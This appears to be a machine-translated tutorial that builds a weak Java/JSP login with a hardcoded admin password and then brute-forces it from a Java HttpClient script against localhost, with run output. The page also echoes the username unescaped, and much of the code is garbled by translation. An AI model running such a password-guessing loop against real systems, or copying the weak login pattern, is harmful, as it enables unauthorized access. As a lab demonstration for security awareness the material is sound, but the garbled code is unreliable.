The first thing to declare is that this article is purely an ignorant view of a little developer without foresight and knowledge, and is intended only for reference in Web system security.
1. Brief description
In siege, the gate is always the easiest place to be breached.
The openness of the login feature allows countless attackers to attempt to guess the user name and password to gain unauthorized access to the system.
This kind of attack is almost ubiquitous, there are systematic attacks, there are boring people attack, set some wrong user name user's boring attempt.
2. Prerequisites and Preparation
We first need a system with a weak password so that we can try brute force attacks.
Do not use this method to attack third-party applications, which is immoral and unfriendly behavior. Sharing this approach is mainly because this attack is too common, and if the system owner and developer do not pay attention to this problem, there is a good chance that the system will be worked hard to break the others.
3. The landing page of the ready-to-use system
<%@ page language="java" import="java.util.*" pageencoding= "UTF-8"%><! DOCTYPE HTML PUBLIC "-//w3c//dtd HTML 4.01 transitional//en" ><html><head><title>Test of a classmate of a meal</title></head><body> <form Action="Aeasylogin.action" method="POST" name="Form1"> <table Width="392" border="1"> <tr> <TD Height="+"><br> <div Align="center"> <p>User name:<input type="text" name="username" size= ></P> <p>Password:<input type="password" name="password" size = > </P> </div></td> </tr> <tr Align="center"> <TD colspan="2" bgcolor= "#FFCCFF"><input type="Submit"value="Login" /> </td> </tr> </table> </form></body></html>
4, simulation of the Java Code login verification
PackageCom.safe;ImportJavax.servlet.http.HttpServletRequest;ImportOrg.apache.commons.lang.xwork.StringUtils;ImportOrg.apache.struts2.ServletActionContext;ImportCom.opensymphony.xwork2.ActionSupport; Public class easyloginaction extends actionsupport { Private Static Final LongSerialversionuid =1931829246016041219L PublicStringExecute()throwsException {HttpServletRequest request = Servletactioncontext.getrequest (); String username = Request.getparameter ("username"); String Password = request.getparameter ("Password"); Request.setattribute ("username", username);//username and password if one is empty, the return fails if(Stringutils.isblank (username) | | Stringutils.isblank (password)) {return "false"; }//Simply assume a username and password: admin, password: qwert if(Username.equals ("Admin") && Password.equals ("Qwert")){return "Success"; }Else{return "false"; } }}
5, landing the successful JSP page
<%@ page language="java" import="java.util.*,javax.servlet.http.*" pageencoding=" UTF-8 "%><! DOCTYPE HTML PUBLIC "-//w3c//dtd HTML 4.01 transitional//en" ><html> <head> <title>Watch your door,-ah, classmate.</title> </head> <body>Successful landing, welcome from<%= (String)request. GETREMOTEADDR ()%>Of<%= (String)request. getattribute ("username")%> </body></html>
6. Unsuccessful landing page
<%@ page language="java" import="java.util.*,javax.servlet.http.*" pageencoding=" UTF-8 "%><! DOCTYPE HTML PUBLIC "-//w3c//dtd HTML 4.01 transitional//en" ><html> <head> <title>Watch your door,-ah, classmate.</title> </head> <body> <%= (String)request. getattribute ("username")%>, the login is unsuccessful, please check your password.</body></html>
7. Java Brute Force attack login code
PackageCom.safe;ImportJava.util.ArrayList;ImportJava.util.List;Importorg.apache.http.HttpEntity;ImportOrg.apache.http.NameValuePair;Importorg.apache.http.client.entity.UrlEncodedFormEntity;ImportOrg.apache.http.client.methods.CloseableHttpResponse;ImportOrg.apache.http.client.methods.HttpPost;ImportOrg.apache.http.impl.client.CloseableHttpClient;Importorg.apache.http.impl.client.HttpClients;ImportOrg.apache.http.message.BasicNameValuePair;ImportOrg.apache.http.util.EntityUtils;/** * Login with httpclient to simulate brute force attacks for web security only examples. * * @author Fan Fangming * * Public class easyattacklogin { //Common password list, for example only StaticString[] passwords = {"123","Qwert"};//has acquired a username, assuming this information we already know StaticString username ="Admin"; Public Static void Main(string[] args)throwsException {closeablehttpclient httpclient = Httpclients.createdefault ();Try{//impersonate user loginHttpPost HttpPost =NewHttpPost ("Http://127.0.0.1:8080/webStudy/aEasyLogin.action"); Easyattacklogin attack =NewEasyattacklogin (); for(inti =0; i < passwords.length; i++) {Attack.getlogin (httpclient,httppost,passwords[i]); } }finally{Httpclient.close (); } } Public Boolean GetLogin(closeablehttpclient httpclient,httppost httppost,string Pass)throwsexception{BooleanFlag =false; List <NameValuePair> Nvps =NewArrayList <NameValuePair> (); Nvps.add (NewBasicnamevaluepair ("username", username));//user name corresponding keyNvps.add (NewBasicnamevaluepair ("Password", pass));//key corresponding to the passwordHttppost.setentity (NewUrlencodedformentity (Nvps)); Closeablehttpresponse response = Httpclient.execute (HttpPost);Try{System.out.println (Response.getstatusline ()); httpentity entity = response.getentity (); String content = entityutils.tostring (entity);//Landing a successful page with this keyword, need to be observed to draw if(Content.indexof ("Successful Landing") >0) {System.out.println ("Password brute force hack successful, user admin password is:"+ Pass); Flag =true; } entityutils.consume (entity); }finally{Response.close (); }returnFlag }}
Run results
http/1.1 OK
http/1.1 OK
Password brute force hack successful, user admin password is: qwert
8. Ubiquitous Security Risks
1, in all likelihood, the password is attacked, is the most common behavior;
2, modern PC hardware and network conditions, so that the landing of violent attacks is a very ordinary thing;
3, do not try to attack others, this is very unfriendly.
Watch your door.-Authentication mechanism is attacked (2)-java brute force attack landing